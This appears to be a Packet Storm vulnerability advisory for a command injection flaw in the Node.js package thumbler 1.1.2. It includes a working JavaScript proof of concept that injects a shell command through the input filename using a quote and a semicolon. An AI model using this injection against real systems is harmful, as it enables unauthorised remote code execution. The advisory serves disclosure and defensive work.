PACKETSTORM 9.8 CRITICAL

📄 thumbler 1.1.2 Command Injection_PACKETSTORM:219864

9.8 / 10
CRITICAL
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

The thumbler package through version 1.1.2 contains a critical command injection vulnerability in the thumbnail function. User-supplied input parameters input, output, time, size are concatenated into a single ffmpeg command string and executed via...

Basic Information

ID PACKETSTORM:219864
Published Apr 27, 2026 at 00:00

Affected Product

Affected Versions: thumbler ≤ 1.1.2

==================================================================================================================================
| # Title : thumbler ≤ 1.1.2 Command Injection in thumbnail() Leading to Remote Code Execution |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://github.com/mmahrous/thumbler |
==================================================================================================================================

[+] Summary : The thumbler package (through version 1.1.2) contains a critical command injection vulnerability in the thumbnail() function.
The user-supplied parameters (input, output, time, size) are concatenated into a single ffmpeg command string and executed via child_process.exec() without sanitization. Because exec() runs that string through a shell, shell metacharacters in any of the four parameters (a double quote, a semicolon, a redirection) are interpreted by the shell instead of reaching ffmpeg as data.
An attacker who controls any of these values can therefore run arbitrary shell commands, giving remote code execution (RCE) on the host with the privileges of the Node.js process.


[+] POC :

// exploit.js
// Needs the vulnerable package installed (thumbler <= 1.1.2) and a POSIX shell,
// since the payload relies on sh metacharacters and writes to /tmp.

const thumbler = require("thumbler");

// Command to smuggle in; its output lands in /tmp/pwned.txt as proof.
const maliciousCommand = "id > /tmp/pwned.txt";

// The double quote terminates the quoted filename inside the ffmpeg command
// string; `echo "` re-opens a quote so the rest of the original line stays
// syntactically valid for the shell.
const maliciousInput = `test.mp4"; ${maliciousCommand}; echo "`;

const outputPath = "/tmp/output.jpg";
const options = {
  time: 5,
  size: "100x100"
};

console.log("[+] Executing command injection via thumbler CVE-2026-26833");
console.log("[+] Malicious input:", maliciousInput);

// thumbnail() concatenates input/output/options into one exec() string.
// ffmpeg itself will usually fail (test.mp4 need not exist), so err is
// expected; by then the injected command has already run.
thumbler.thumbnail(maliciousInput, outputPath, options, (err, stdout, stderr) => {
  if (err) {
    console.log("[!] Thumbnail generation failed (but command may have executed)");
    console.log("Error:", err.message);
  } else {
    console.log("[+] Thumbnail generated (injection might still work)");
  }

  console.log("[*] Check if the command executed by running: cat /tmp/pwned.txt");
});


Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================
